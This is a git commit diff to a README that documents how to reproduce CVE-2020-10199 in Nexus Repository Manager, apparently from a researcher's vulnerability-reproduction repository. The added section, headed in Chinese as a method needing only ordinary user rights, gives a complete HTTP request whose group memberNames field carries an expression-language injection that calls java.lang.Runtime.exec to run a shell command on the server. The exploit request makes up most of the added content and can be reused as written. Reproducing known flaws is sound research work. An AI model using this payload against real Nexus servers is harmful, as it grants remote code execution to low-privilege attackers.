op:nexus CVE-2020-10199

“threedr3am” · “threedr3am” · commit 93d57c428333 · 2020-04-07T14:07:22.000+08:00
diff --git a/nexus/CVE-2020-10199/README.md b/nexus/CVE-2020-10199/README.md
@@ -33,6 +33,7 @@ idea创建远程debug-启动
 ### 5. 登陆任何一个账号
 
 ### 6. 调用接口
+#### 方法一（需要管理员权限）
 1. 创建CleanupPolicy：
 ```
 POST /service/extdirect HTTP/1.1
@@ -99,4 +100,37 @@ Connection: close
     "passphrase": "string"
   }
 }
+```
+
+#### 方法二（普通用户权限）
+```
+POST /service/rest/beta/repositories/go/group HTTP/1.1
+Host: 127.0.0.1:8081
+Content-Length: 195
+X-Requested-With: XMLHttpRequest
+X-Nexus-UI: true
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+NX-ANTI-CSRF-TOKEN: 0.7886248393834028
+Content-Type: application/json
+Accept: */*
+Origin: http://127.0.0.1:8081
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Referer: http://127.0.0.1:8081/
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.7886248393834028; NXSESSIONID=396e7352-f76c-4bdd-9833-98d7990dca3b
+Connection: close
+
+{
+  "name": "internal",
+  "online": true,
+  "storage": {
+    "blobStoreName": "default",
+    "strictContentTypeValidation": true
+  },
+  "group": {
+    "memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10199')}"]
+  }
+}
 ```
